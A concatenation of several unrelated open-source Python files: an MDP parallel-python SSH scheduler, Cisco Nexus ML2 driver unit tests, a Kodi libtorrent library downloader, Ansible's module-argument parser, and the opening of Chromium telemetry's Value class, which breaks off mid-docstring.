"""Create an internal pp server and initialize the scheduler.
ncpus -- Integer or 'autodetect', specifies the number of processes
used.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
        verbose -- If True, get progress reports from the scheduler.
"""
ppserver = pp.Server(ncpus=ncpus)
super(LocalPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
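# Illustrative usage sketch with an MDP parallel flow (the nodes and
# data_iterables below are hypothetical):
#
#   scheduler = LocalPPScheduler(ncpus=4, verbose=True)
#   parallel_flow = mdp.parallel.ParallelFlow([node1, node2])
#   parallel_flow.train(data_iterables, scheduler=scheduler)
#
# Each task is forked and submitted to the local pp server; add_task only
# blocks once the pp queue grows beyond max_queue_length.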
# default secret
SECRET = "rosebud"
class NetworkPPScheduler(PPScheduler):
"""Scheduler which can manage pp remote servers (requires SSH).
The remote slave servers are automatically started and killed at the end.
    Since the slaves are started via SSH this scheduler does not work on normal
Windows systems. On such systems you can start the pp slaves
manually and then use the standard PPScheduler.
"""
def __init__(self, max_queue_length=1,
result_container=None,
verbose=False,
remote_slaves=None,
source_paths=None,
port=50017,
secret=SECRET,
nice=-19,
timeout=3600,
n_local_workers=0,
slave_kill_filename=None,
remote_python_executable=None):
"""Initialize the remote slaves and create the internal pp scheduler.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
        verbose -- If True, get progress reports from the scheduler.
remote_slaves -- List of tuples, the first tuple entry is a string
            containing the name or IP address of the slave, the second entry
contains the number of processes (i.e. the pp ncpus parameter).
The second entry can be None to use 'autodetect'.
source_paths -- List of paths that will be appended to sys.path in the
slaves.
n_local_workers -- Value of ncpus for this machine.
secret -- Secret password to secure the remote slaves.
slave_kill_filename -- Filename (including path) where a list of the
remote slave processes should be stored. Together with the
            'kill_slaves' function this makes it possible to quickly kill all
remote slave processes in case something goes wrong.
If None, a tempfile is created.
"""
self._remote_slaves = remote_slaves
self._running_remote_slaves = None # list of strings 'address:port'
# list with processes for the ssh connections to the slaves
self._ssh_procs = None
self._remote_pids = None # list of the pids of the remote servers
self._port = port
        if slave_kill_filename is None:
            slave_kill_file = tempfile.mkstemp(prefix='MDPtmp-')[1]
            self.slave_kill_file = slave_kill_file
        else:
            self.slave_kill_file = slave_kill_filename
self._secret = secret
self._slave_nice = nice
self._timeout = timeout
if not source_paths:
self._source_paths = []
else:
self._source_paths = source_paths
if remote_python_executable is None:
remote_python_executable = sys.executable
self._python_executable = remote_python_executable
module_file = os.path.abspath(__file__)
self._script_path = os.path.dirname(module_file)
self.verbose = verbose
# start ppserver
self._start_slaves()
ppslaves = tuple(["%s:%d" % (address, self._port)
for address in self._running_remote_slaves])
ppserver = pp.Server(ppservers=ppslaves,
ncpus=n_local_workers,
secret=self._secret)
super(NetworkPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
def _shutdown(self):
"""Shutdown all slaves."""
for ssh_proc in self._ssh_procs:
os.kill(ssh_proc.pid, signal.SIGQUIT)
super(NetworkPPScheduler, self)._shutdown()
if self.verbose:
print "All slaves shut down."
def start_slave(self, address, ncpus="autodetect"):
"""Start a single remote slave.
The return value is a tuple of the ssh process handle and
the remote pid.
"""
try:
print "starting slave " + address + " ..."
proc = subprocess.Popen(["ssh","-T", "%s" % address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("cd %s\n" % self._script_path)
cmd = (self._python_executable +
" pp_slave_script.py %d %d %d %s %d" %
(self._slave_nice, self._port, self._timeout, self._secret,
ncpus))
proc.stdin.write(cmd + "\n")
# send additional information to the remote process
proc.stdin.write(self._python_executable + "\n")
for sys_path in self._source_paths:
proc.stdin.write(sys_path + "\n")
proc.stdin.write("_done_" + "\n")
# print status message from slave
sys.stdout.write(address + ": " + proc.stdout.readline())
# get PID for remote slave process
pid = None
if self.verbose:
print "*** output from slave %s ***" % address
while pid is None:
# the slave process might first output some hello message
try:
value = proc.stdout.readline()
if self.verbose:
print value
pid = int(value)
except ValueError:
pass
if self.verbose:
print "*** output end ***"
return (proc, pid)
except:
print "Initialization of slave %s has failed." % address
traceback.print_exc()
return None
def _start_slaves(self):
"""Start remote slaves.
The slaves that could be started are stored in a textfile, in the form
            address:pid:ssh_pid
"""
with open(self.slave_kill_file, 'w') as slave_kill_file:
self._running_remote_slaves = []
self._remote_pids = []
self._ssh_procs = []
for (address, ncpus) in self._remote_slaves:
ssh_proc, pid = self.start_slave(address, ncpus=ncpus)
if pid is not None:
slave_kill_file.write("%s:%d:%d\n" %
(address, pid, ssh_proc.pid))
self._running_remote_slaves.append(address)
self._remote_pids.append(pid)
self._ssh_procs.append(ssh_proc)
def kill_slaves(slave_kill_filename):
"""Kill all remote slaves which are stored in the given file.
This functions is only meant for emergency situations, when something
went wrong and the slaves have to be killed manually.
"""
with open(slave_kill_filename) as tempfile:
for line in tempfile:
address, pid, ssh_pid = line.split(":")
pid = int(pid)
ssh_pid = int(ssh_pid)
# open ssh connection to to kill remote slave
proc = subprocess.Popen(["ssh","-T", address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("kill %d\n" % pid)
proc.stdin.flush()
# kill old ssh connection
try:
os.kill(ssh_pid, signal.SIGKILL)
except:
pass
# a kill might prevent the kill command transmission
# os.kill(proc.pid, signal.SIGQUIT)
print "killed slave " + address + " (pid %d)" % pid
print "all slaves killed."
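# Illustrative emergency usage (sketch): the slave-kill file written by
# NetworkPPScheduler holds one "address:pid:ssh_pid" line per remote slave and
# can be passed to this module on the command line, e.g.
#
#   python pp_support.py /tmp/MDPtmp-abc123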
if __name__ == "__main__":
if len(sys.argv) == 2:
kill_slaves(sys.argv[1])
else:
sys.stderr.write("usage: %s slave_list.txt\n" % __file__)
| lgpl-2.1 | 7,051,554,097,536,873,000 | 39.622419 | 90 | 0.584053 | false |
nikolay-fedotov/networking-cisco | networking_cisco/tests/unit/ml2/drivers/cisco/nexus/test_cisco_nexus.py | 1 | 7977 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import mock
from oslo_utils import importutils
import testtools
from networking_cisco.plugins.ml2.drivers.cisco.nexus import (
nexus_network_driver)
from networking_cisco.plugins.ml2.drivers.cisco.nexus import constants
from networking_cisco.plugins.ml2.drivers.cisco.nexus import exceptions
from networking_cisco.plugins.ml2.drivers.cisco.nexus import mech_cisco_nexus
from networking_cisco.plugins.ml2.drivers.cisco.nexus import nexus_db_v2
from neutron.common import constants as n_const
from neutron.extensions import portbindings
from neutron.plugins.ml2 import driver_api as api
from neutron.tests.unit import testlib_api
NEXUS_IP_ADDRESS = '1.1.1.1'
NEXUS_IP_ADDRESS_PC = '2.2.2.2'
NEXUS_IP_ADDRESS_DUAL = '3.3.3.3'
HOST_NAME_1 = 'testhost1'
HOST_NAME_2 = 'testhost2'
HOST_NAME_PC = 'testpchost'
HOST_NAME_DUAL = 'testdualhost'
INSTANCE_1 = 'testvm1'
INSTANCE_2 = 'testvm2'
INSTANCE_PC = 'testpcvm'
INSTANCE_DUAL = 'testdualvm'
NEXUS_PORT_1 = 'ethernet:1/10'
NEXUS_PORT_2 = 'ethernet:1/20'
NEXUS_PORTCHANNELS = 'portchannel:2'
NEXUS_DUAL = 'ethernet:1/3,portchannel:2'
VLAN_ID_1 = 267
VLAN_ID_2 = 265
VLAN_ID_PC = 268
VLAN_ID_DUAL = 269
DEVICE_OWNER = 'compute:test'
NEXUS_SSH_PORT = '22'
PORT_STATE = n_const.PORT_STATUS_ACTIVE
NETWORK_TYPE = 'vlan'
NEXUS_DRIVER = ('networking_cisco.plugins.ml2.drivers.cisco.nexus.'
'nexus_network_driver.CiscoNexusDriver')
class FakeNetworkContext(object):
"""Network context for testing purposes only."""
def __init__(self, segment_id):
self._network_segments = {api.SEGMENTATION_ID: segment_id,
api.NETWORK_TYPE: NETWORK_TYPE}
@property
def network_segments(self):
return self._network_segments
class FakePortContext(object):
"""Port context for testing purposes only."""
def __init__(self, device_id, host_name, network_context):
self._port = {
'status': PORT_STATE,
'device_id': device_id,
'device_owner': DEVICE_OWNER,
portbindings.HOST_ID: host_name,
portbindings.VIF_TYPE: portbindings.VIF_TYPE_OVS
}
self._network = network_context
self._segment = network_context.network_segments
@property
def current(self):
return self._port
@property
def network(self):
return self._network
@property
def bottom_bound_segment(self):
return self._segment
class TestCiscoNexusDevice(testlib_api.SqlTestCase):
"""Unit tests for Cisco ML2 Nexus device driver."""
TestConfigObj = collections.namedtuple(
'TestConfigObj',
'nexus_ip_addr host_name nexus_port instance_id vlan_id')
test_configs = {
'test_config1': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_1,
NEXUS_PORT_1,
INSTANCE_1,
VLAN_ID_1),
'test_config2': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_2,
NEXUS_PORT_2,
INSTANCE_2,
VLAN_ID_2),
'test_config_portchannel': TestConfigObj(
NEXUS_IP_ADDRESS_PC,
HOST_NAME_PC,
NEXUS_PORTCHANNELS,
INSTANCE_PC,
VLAN_ID_PC),
'test_config_dual': TestConfigObj(
NEXUS_IP_ADDRESS_DUAL,
HOST_NAME_DUAL,
NEXUS_DUAL,
INSTANCE_DUAL,
VLAN_ID_DUAL),
}
def setUp(self):
"""Sets up mock ncclient, and switch and credentials dictionaries."""
super(TestCiscoNexusDevice, self).setUp()
# Use a mock netconf client
mock_ncclient = mock.Mock()
mock.patch.object(nexus_network_driver.CiscoNexusDriver,
'_import_ncclient',
return_value=mock_ncclient).start()
def new_nexus_init(mech_instance):
mech_instance.driver = importutils.import_object(NEXUS_DRIVER)
mech_instance._nexus_switches = {}
for name, config in TestCiscoNexusDevice.test_configs.items():
ip_addr = config.nexus_ip_addr
host_name = config.host_name
nexus_port = config.nexus_port
mech_instance._nexus_switches[(ip_addr,
host_name)] = nexus_port
mech_instance._nexus_switches[(ip_addr,
'ssh_port')] = NEXUS_SSH_PORT
mech_instance._nexus_switches[(ip_addr,
constants.USERNAME)] = 'admin'
mech_instance._nexus_switches[(ip_addr,
constants.PASSWORD)] = 'password'
mech_instance.driver.nexus_switches = (
mech_instance._nexus_switches)
mock.patch.object(mech_cisco_nexus.CiscoNexusMechanismDriver,
'__init__', new=new_nexus_init).start()
self._cisco_mech_driver = (mech_cisco_nexus.
CiscoNexusMechanismDriver())
def _create_delete_port(self, port_config):
"""Tests creation and deletion of a virtual port."""
nexus_ip_addr = port_config.nexus_ip_addr
host_name = port_config.host_name
nexus_port = port_config.nexus_port
instance_id = port_config.instance_id
vlan_id = port_config.vlan_id
network_context = FakeNetworkContext(vlan_id)
port_context = FakePortContext(instance_id, host_name,
network_context)
self._cisco_mech_driver.update_port_precommit(port_context)
self._cisco_mech_driver.update_port_postcommit(port_context)
for port_id in nexus_port.split(','):
bindings = nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
self.assertEqual(len(bindings), 1)
self._cisco_mech_driver.delete_port_precommit(port_context)
self._cisco_mech_driver.delete_port_postcommit(port_context)
for port_id in nexus_port.split(','):
with testtools.ExpectedException(
exceptions.NexusPortBindingNotFound):
nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
def test_create_delete_ports(self):
"""Tests creation and deletion of two new virtual Ports."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config1'])
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config2'])
def test_create_delete_portchannel(self):
"""Tests creation of a port over a portchannel."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_portchannel'])
def test_create_delete_dual(self):
"""Tests creation and deletion of dual ports for single server"""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_dual'])
| apache-2.0 | -1,957,225,653,470,041,300 | 35.591743 | 79 | 0.598471 | false |
alfa-addon/addon | plugin.video.alfa/lib/python_libtorrent/python_libtorrent/functions.py | 1 | 10908 | #-*- coding: utf-8 -*-
'''
python-libtorrent for Kodi (script.module.libtorrent)
Copyright (C) 2015-2016 DiMartino, srg70, RussakHH, aisman
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
from __future__ import absolute_import
from builtins import object
import sys
PY3 = False
if sys.version_info[0] >= 3: PY3 = True; unicode = str; unichr = chr; long = int
import time
import xbmc, xbmcgui, xbmcaddon
from .net import HTTP
from core import filetools ### Alfa
from core import ziptools
from platformcode import config ### Alfa
#__libbaseurl__ = "https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
#__settings__ = xbmcaddon.Addon(id='script.module.libtorrent')
#__version__ = __settings__.getAddonInfo('version')
#__plugin__ = __settings__.getAddonInfo('name') + " v." + __version__
#__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
# 'script.module.libtorrent', 'icon.png')
#__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
__version__ = '2.0.2' ### Alfa
__plugin__ = "python-libtorrent v.2.0.2" ### Alfa
__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
'plugin.video.alfa', 'icon.png') ### Alfa
#__language__ = __settings__.getLocalizedString ### Alfa
#from python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
from lib.python_libtorrent.python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
def log(msg):
if PY3:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGINFO )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGINFO )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGINFO )
else:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGNOTICE )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGNOTICE )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGNOTICE )
def getSettingAsBool(setting):
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
return __settings__.getSetting(setting).lower() == "true"
class LibraryManager(object):
def __init__(self, dest_path, platform):
self.dest_path = dest_path
self.platform = platform
self.root=filetools.dirname(filetools.dirname(__file__))
        ver1, ver2, ver3 = platform['version'].split('.')              ### Alfa: rest of the method
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
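        # Editor's note (assumption based on the branch below): libtorrent builds for
        # version 1.2 and newer are fetched from the Alfa repo mirrors, while older
        # versions fall back to the original DiMartino script.module.libtorrent repo.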
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
def check_exist(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
for libname in get_libname(self.platform):
if not filetools.exists(filetools.join(self.dest_path, libname)):
return False
return True
def check_update(self):
need_update=False
for libname in get_libname(self.platform):
if libname!='liblibtorrent.so':
self.libpath = filetools.join(self.dest_path, libname)
self.sizepath=filetools.join(self.root, self.platform['system'], self.platform['version'], libname+'.size.txt')
size=str(filetools.getsize(self.libpath))
size_old=open( self.sizepath, "r" ).read()
if size_old!=size:
need_update=True
return need_update
def update(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
if self.check_update():
for libname in get_libname(self.platform):
self.libpath = filetools.join(self.dest_path, libname)
filetools.remove(self.libpath)
self.download()
def download(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
        ver1, ver2, ver3 = self.platform['version'].split('.')              ### Alfa: rest of the method (self.platform, since the platform argument may be empty)
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
filetools.mkdir(self.dest_path)
for libname in get_libname(self.platform):
p_version = self.platform['version']
if PY3: p_version += '_PY3'
dest = filetools.join(self.dest_path, libname)
log("try to fetch %s/%s/%s" % (self.platform['system'], p_version, libname))
for url_lib in __libbaseurl__: ### Alfa
url = "%s/%s/%s/%s.zip" % (url_lib, self.platform['system'], p_version, libname)
url_size = "%s/%s/%s/%s.size.txt" % (url_lib, self.platform['system'], p_version, libname)
if libname!='liblibtorrent.so':
try:
self.http = HTTP()
response = self.http.fetch(url, download=dest + ".zip", progress=False) ### Alfa
log("%s -> %s" % (url, dest))
if response.code != 200: continue ### Alfa
response = self.http.fetch(url_size, download=dest + '.size.txt', progress=False) ### Alfa
log("%s -> %s" % (url_size, dest + '.size.txt'))
if response.code != 200: continue ### Alfa
try:
unzipper = ziptools.ziptools()
unzipper.extract("%s.zip" % dest, self.dest_path)
except:
xbmc.executebuiltin('Extract("%s.zip","%s")' % (dest, self.dest_path))
time.sleep(1)
if filetools.exists(dest):
filetools.remove(dest + ".zip")
except:
import traceback
text = 'Failed download %s!' % libname
log(text)
log(traceback.format_exc(1))
#xbmc.executebuiltin("Notification(%s,%s,%s,%s)" % (__plugin__,text,750,__icon__))
continue
else:
filetools.copy(filetools.join(self.dest_path, 'libtorrent.so'), dest, silent=True) ### Alfa
#dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Path')), \
# 'lib', libname) ### Alfa
#filetools.copy(dest, dest_alfa, silent=True) ### Alfa
dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Profile')), \
'bin', libname) ### Alfa
filetools.remove(dest_alfa, silent=True)
filetools.copy(dest, dest_alfa, silent=True) ### Alfa
break
else:
return False
return True
def android_workaround(self, new_dest_path): ### Alfa (entera)
for libname in get_libname(self.platform):
libpath = filetools.join(self.dest_path, libname)
size = str(filetools.getsize(libpath))
new_libpath = filetools.join(new_dest_path, libname)
if filetools.exists(new_libpath):
new_size = str(filetools.getsize(new_libpath))
if size != new_size:
res = filetools.remove(new_libpath, su=True)
if res:
log('Deleted: (%s) %s -> (%s) %s' %(size, libpath, new_size, new_libpath))
if not filetools.exists(new_libpath):
res = filetools.copy(libpath, new_libpath, ch_mod='777', su=True) ### ALFA
else:
log('Module exists. Not copied... %s' % new_libpath) ### ALFA
return new_dest_path
| gpl-3.0 | 4,003,463,386,131,299,000 | 50.201878 | 127 | 0.530992 | false |
h4ck3rm1k3/ansible | v2/ansible/parsing/mod_args.py | 1 | 10144 | # (c) 2014 Michael DeHaan, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import iteritems, string_types
from types import NoneType
from ansible.errors import AnsibleParserError
from ansible.plugins import module_loader
from ansible.parsing.splitter import parse_kv
class ModuleArgsParser:
"""
There are several ways a module and argument set can be expressed:
# legacy form (for a shell command)
- action: shell echo hi
# common shorthand for local actions vs delegate_to
- local_action: shell echo hi
# most commonly:
- copy: src=a dest=b
# legacy form
- action: copy src=a dest=b
# complex args form, for passing structured data
- copy:
src: a
dest: b
# gross, but technically legal
- action:
module: copy
args:
src: a
dest: b
# extra gross, but also legal. in this case, the args specified
    # will act as 'defaults' and will be overridden by any args specified
    # in one of the other formats (complex args under the action, or
    # parsed from the k=v string)
- command: 'pwd'
args:
chdir: '/tmp'
This class has some of the logic to canonicalize these into the form
- module: <module_name>
delegate_to: <optional>
args: <args>
Args may also be munged for certain shell command parameters.
"""
def __init__(self, task_ds=dict()):
assert isinstance(task_ds, dict)
self._task_ds = task_ds
def _split_module_string(self, str):
'''
when module names are expressed like:
action: copy src=a dest=b
the first part of the string is the name of the module
and the rest are strings pertaining to the arguments.
'''
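        # Illustrative (editor's note): "copy src=a dest=b" -> ("copy", "src=a dest=b"),
        # while a bare module name such as "ping" -> ("ping", "").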
tokens = str.split()
if len(tokens) > 1:
return (tokens[0], " ".join(tokens[1:]))
else:
return (tokens[0], "")
def _handle_shell_weirdness(self, action, args):
'''
given an action name and an args dictionary, return the
proper action name and args dictionary. This mostly is due
to shell/command being treated special and nothing else
'''
# don't handle non shell/command modules in this function
# TODO: in terms of the whole app, should 'raw' also fit here?
if action not in ['shell', 'command']:
return (action, args)
# the shell module really is the command module with an additional
# parameter
if action == 'shell':
action = 'command'
args['_uses_shell'] = True
return (action, args)
def _normalize_parameters(self, thing, action=None, additional_args=dict()):
'''
arguments can be fuzzy. Deal with all the forms.
'''
# final args are the ones we'll eventually return, so first update
# them with any additional args specified, which have lower priority
# than those which may be parsed/normalized next
final_args = dict()
if additional_args:
final_args.update(additional_args)
# how we normalize depends if we figured out what the module name is
# yet. If we have already figured it out, it's an 'old style' invocation.
# otherwise, it's not
if action is not None:
args = self._normalize_old_style_args(thing, action)
else:
(action, args) = self._normalize_new_style_args(thing)
# this can occasionally happen, simplify
if args and 'args' in args:
args = args['args']
# finally, update the args we're going to return with the ones
# which were normalized above
if args:
final_args.update(args)
return (action, final_args)
def _normalize_old_style_args(self, thing, action):
'''
deals with fuzziness in old-style (action/local_action) module invocations
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'local_action' : 'shell echo hi' }
{ 'action' : 'shell echo hi' }
{ 'local_action' : { 'module' : 'ec2', 'x' : 1, 'y': 2 }}
standardized outputs like:
( 'command', { _raw_params: 'echo hi', _uses_shell: True }
'''
if isinstance(thing, dict):
# form is like: local_action: { module: 'xyz', x: 2, y: 3 } ... uncommon!
args = thing
elif isinstance(thing, string_types):
# form is like: local_action: copy src=a dest=b ... pretty common
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(thing, check_raw=check_raw)
elif isinstance(thing, NoneType):
# this can happen with modules which take no params, like ping:
args = None
else:
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return args
def _normalize_new_style_args(self, thing):
'''
deals with fuzziness in new style module invocations
accepting key=value pairs and dictionaries, and always returning dictionaries
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'shell' : 'echo hi' }
{ 'ec2' : { 'region' : 'xyz' }
{ 'ec2' : 'region=xyz' }
standardized outputs like:
('ec2', { region: 'xyz'} )
'''
action = None
args = None
if isinstance(thing, dict):
# form is like: copy: { src: 'a', dest: 'b' } ... common for structured (aka "complex") args
thing = thing.copy()
if 'module' in thing:
action = thing['module']
args = thing.copy()
del args['module']
elif isinstance(thing, string_types):
# form is like: copy: src=a dest=b ... common shorthand throughout ansible
(action, args) = self._split_module_string(thing)
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(args, check_raw=check_raw)
else:
# need a dict or a string, so giving up
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return (action, args)
def parse(self):
'''
Given a task in one of the supported forms, parses and returns
returns the action, arguments, and delegate_to values for the
task, dealing with all sorts of levels of fuzziness.
'''
thing = None
action = None
delegate_to = None
args = dict()
#
# We can have one of action, local_action, or module specified
#
# this is the 'extra gross' scenario detailed above, so we grab
# the args and pass them in as additional arguments, which can/will
# be overwritten via dict updates from the other arg sources below
# FIXME: add test cases for this
additional_args = self._task_ds.get('args', dict())
# action
if 'action' in self._task_ds:
# an old school 'action' statement
thing = self._task_ds['action']
delegate_to = None
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# local_action
if 'local_action' in self._task_ds:
# local_action is similar but also implies a delegate_to
if action is not None:
raise AnsibleParserError("action and local_action are mutually exclusive", obj=self._task_ds)
thing = self._task_ds.get('local_action', '')
delegate_to = 'localhost'
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# module: <stuff> is the more new-style invocation
# walk the input dictionary to see we recognize a module name
for (item, value) in iteritems(self._task_ds):
if item in module_loader or item == 'meta':
# finding more than one module name is a problem
if action is not None:
raise AnsibleParserError("conflicting action statements", obj=self._task_ds)
action = item
thing = value
action, args = self._normalize_parameters(value, action=action, additional_args=additional_args)
# if we didn't see any module in the task at all, it's not a task really
if action is None:
raise AnsibleParserError("no action detected in task", obj=self._task_ds)
# FIXME: disabled for now, as there are other places besides the shell/script modules where
# having variables as the sole param for the module is valid (include_vars, add_host, and group_by?)
#elif args.get('_raw_params', '') != '' and action not in ('command', 'shell', 'script', 'include_vars'):
# raise AnsibleParserError("this task has extra params, which is only allowed in the command, shell or script module.", obj=self._task_ds)
# shell modules require special handling
(action, args) = self._handle_shell_weirdness(action, args)
return (action, args, delegate_to)
| gpl-3.0 | -3,236,003,832,605,205,000 | 35.489209 | 149 | 0.605185 | false |
sgraham/nope | tools/telemetry/telemetry/value/__init__.py | 1 | 12490 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
The Value hierarchy provides a way of representing the values measurements
produce such that they can be merged across runs, grouped by page, and output
to different targets.
The core Value concept provides the basic functionality:
- association with a page, may be none
- naming and units
- importance tracking [whether a value will show up on a waterfall or output
file by default]
- other metadata, such as a description of what was measured
- default conversion to scalar and string
- merging properties
A page may actually run a few times during a single telemetry session.
Downstream consumers of test results typically want to group these runs
together, then compute summary statistics across runs. Value provides the
Merge* family of methods for this kind of aggregation.
"""
import os
from telemetry.core import discover
from telemetry.core import util
# When combining a pair of Values together, it is sometimes ambiguous whether
# the values should be concatenated, or one should be picked as representative.
# The possible merging policies are listed here.
CONCATENATE = 'concatenate'
PICK_FIRST = 'pick-first'
# When converting a Value to its buildbot equivalent, the context in which the
# value is being interpreted actually affects the conversion. This is insane,
# but there you have it. There are three contexts in which Values are converted
# for use by buildbot, represented by these output-intent values.
PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context'
COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context'
SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context'
class Value(object):
"""An abstract value produced by a telemetry page test.
"""
def __init__(self, page, name, units, important, description,
interaction_record):
"""A generic Value object.
Args:
page: A Page object, may be given as None to indicate that the value
represents results for multiple pages.
name: A value name string, may contain a dot. Values from the same test
with the same prefix before the dot may be considered to belong to
the same chart.
units: A units string.
important: Whether the value is "important". Causes the value to appear
by default in downstream UIs.
description: A string explaining in human-understandable terms what this
value represents.
interaction_record: The string label of the TimelineInteractionRecord with
which this value is associated.
"""
# TODO(eakuefner): Check user story here after migration (crbug.com/442036)
if not isinstance(name, basestring):
raise ValueError('name field of Value must be string.')
if not isinstance(units, basestring):
raise ValueError('units field of Value must be string.')
if not isinstance(important, bool):
raise ValueError('important field of Value must be bool.')
if not ((description is None) or isinstance(description, basestring)):
raise ValueError('description field of Value must absent or string.')
if not ((interaction_record is None) or
isinstance(interaction_record, basestring)):
raise ValueError('interaction_record field of Value must absent or '
'string.')
self.page = page
self.name = name
self.units = units
self.important = important
self.description = description
self.interaction_record = interaction_record
def IsMergableWith(self, that):
return (self.units == that.units and
type(self) == type(that) and
self.important == that.important and
self.interaction_record == that.interaction_record)
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
"""Combines the provided list of values into a single compound value.
When a page runs multiple times, it may produce multiple values. This
function is given the same-named values across the multiple runs, and has
the responsibility of producing a single result.
It must return a single Value. If merging does not make sense, the
implementation must pick a representative value from one of the runs.
For instance, it may be given
